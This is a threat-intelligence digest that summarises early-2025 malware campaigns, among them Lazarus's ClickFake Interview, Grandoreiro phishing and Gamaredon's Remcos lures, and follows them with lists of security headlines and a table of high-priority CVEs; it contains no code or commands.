ClickFake Interview campaign leverages fake crypto recruitment scheme to deliver GolangGhost
In February 2025, Sekoia researchers observed a campaign by the North Korean threat actor Lazarus Group, dubbed ClickFake Interview, targeting job seekers within the cryptocurrency industry. The campaign leverages fake job offers, legitimate job interview websites, and the ClickFix tactic to execute the GolangGhost backdoor and FrostyFerret. The infection chain varies by operating system, with both Windows and macOS systems targeted by the campaign. ClickFake Interview initially shares URLs on social media, inviting victims to a fake online cryptocurrency-related interview. Victims are required to create an introductory video using their camera, which displays an error message that instructs the user to download a driver. The user is then prompted to follow a ClickFix prompt to update their driver, with a VBScript used to download and execute the GolangGhost backdoor on Windows, while a bash script is used to execute FrostyFerret before launching GolangGhost on macOS. ClickFake Interview is believed to be a continuation of the Contagious Interview campaign.
RolandSkimmer campaign uses malicious browser extensions to steal financial data
Fortinet researchers observed a credit card skimming campaign, dubbed RolandSkimmer, targeting individuals in Bulgaria. The campaign leverages malicious browser extensions across Google Chrome, Microsoft Edge, and Firefox to harvest and exfiltrate sensitive financial data from users. The attack begins with a malicious ZIP file containing a deceptive LNK file, which deploys obfuscated VBScripts to establish persistent and covert access. The attacker then downloads additional files, with malicious JavaScript payloads and encoded RAR files used to install the malicious browser extensions, depending on the target browser. The attackers also replaced legitimate Microsoft Edge shortcuts in the Desktop and Taskbar with the malicious shortcuts.
Phishing campaigns distribute Grandoreiro banking trojan to Latin America and Europe
Forcepoint researchers observed a resurgence in Grandoreiro banking trojan activity, with the malware currently being distributed in large-scale phishing campaigns to banking users in Latin American and Europe. Threat actors leverage VPS hosting providers and obfuscation techniques to evade detection, as well as dynamic URLs and social engineering to maximize the malware’s reach and effectiveness. A recent campaign, targeting Mexico, Argentina, and Spain, impersonates tax agencies and uses fraudulent government emails to trick users. The emails are marked as high importance and contain malicious URLs that redirect users to the website of the Contabo hosting service, where they are prompted to download a PDF, which downloads a ZIP file. The ZIP file leads victims to download an obfuscated VBScript and an EXE payload disguised as an Acrobat Reader error pop-up designed to steal credentials.
Gamaredon targets Ukrainian users with war-related lures to deliver Remcos backdoor
Cisco Talos researchers discovered a suspected Gamaredon campaign, ongoing since at least November 2024, targeting Ukrainian users with malicious LNK files that ultimately deliver the Remcos backdoor. The LNK files are compressed inside ZIP archives and often disguised as Office documents, named using Russian words related to the movement of troops in Ukraine as a lure. The researchers believe that Gamaredon is likely maintaining its technique of sending phishing emails attached with a ZIP file or containing a URL link to download the file from a remote host. The LNK files contain PowerShell code that downloads and executes the next-stage payload in ZIP format, as well as a decoy file. The ZIP payload contains an executable binary that loads a malicious DLL via DLL sideloading, which in turn serves as the loader for Remcos.
First Ukrainian International Bank users targeted with Emmenhtal to deliver SmokeLoader
G DATA researchers discovered a campaign impersonating First Ukrainian International Bank to deliver the Emmenhtal malware loader to users. The malware was observed being chained with SmokeLoader, enabling the attackers to deploy additional malware dynamically using SmokeLoader’s modular capabilities. The campaign starts with an email claiming to confirm a payment has been made. The email contains a 7z archive file attachment with supposed payment instructions, which, once extracted, reveals a decoy PDF file and a PDF shortcut. The latter is used to download a file from a remote server that executes mshta via PowerShell to download Emmenhtal, which is later used to deploy SmokeLoader.
Ransomware
An in-depth look at Black Basta’s TTPsIntel471 Blog – Apr 02 2025Crimelords at Hunters International tell lackeys ransomware too ‘risky’The Register – Security – Apr 02 2025DragonForce Claims to Be Taking Over RansomHub Ransomware InfrastructureThe Cyber Express – Apr 02 2025A Rebirth of a Cursed Existence? – The Babuk Locker 2.0Rapid7 – Apr 02 2025Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstreamSophos – Apr 01 2025National Defense Corporation victim of ransomware attack; discloses breach and declines to pay any ransom.DataBreaches.net – Mar 31 2025Fake Zoom Ends in BlackSuit RansomwareThe DFIR Report – Blog – Mar 31 2025
Financial Services
‘Salvador Stealer’ Targets Banking Customers with Sophisticated MalwareTechNadu – Apr 02 2025“Urgent reminder” tax scam wants to phish your Microsoft credentialsMalwarebytes Labs Blog – Apr 01 2025TsarBot Android Malware Mimics 750 Banking & Finance Apps to Steal CredentialsCyberSecurityNews.com – Mar 30 2025Exposing Crocodilus: New Device Takeover Malware Targeting Android DevicesThreat Fabric Blog – Mar 28 2025Multiple crypto packages hijacked, turned into info-stealersSonatype – Mar 27 2025
Geopolitics
Moscow Subway Website Hit by Cyberattack in Apparent Retaliation for Attack on Ukrainian RailwaysBitdefender – Apr 03 2025DPRK IT Workers Expanding in Scope and Scale Google Cloud Threat Intelligence – Apr 01 2025Operation HollowQuill: Malware delivered into Russian R&D Networks via Research Decoy PDFsSeqrite Blog – Mar 31 2025Russian Phishing Uses Fake CIA Sites to Target Anti-war, Ukraine SupportersHackRead – Mar 28 2025OpIsrael 2025: Hacktivist Coordination Intensifies Ahead of April 7Threat Reports – Radware – Mar 26 2025
High Priority Vulnerabilities
Name | name | Software | Base Score |
Temp Score |
---|---|---|---|---|
CVE-2025-0282 | Neurons for ZTA gateways | 9.0 | 7.7 | |
Related: RESURGE malware used to create web shells following Ivanti Connect Secure compromise | ||||
CVE-2024-20439 | Smart License Utility | 9.8 | 9.4 | |
Related: CISA Warns of Active Exploitation of Cisco Smart Licensing Utility Flaw | ||||
CVE-2024-31982 | xwiki-platform-search-ui | 9.8 | 7.0 | |
Related: Exploit attempts observed targeting XWiki OS command injection flaw | ||||
CVE-2020-8515 | Vigor300B | 9.8 | 9.8 | |
Related: Targeting of DrayTek routers observed amidst reports of reboots | ||||
CVE-2025-24201 | macOS | 8.8 | 6.0 | |
Related: Apple patches multiple zero-day flaws in iPhone, iPads, and macOS Sonoma |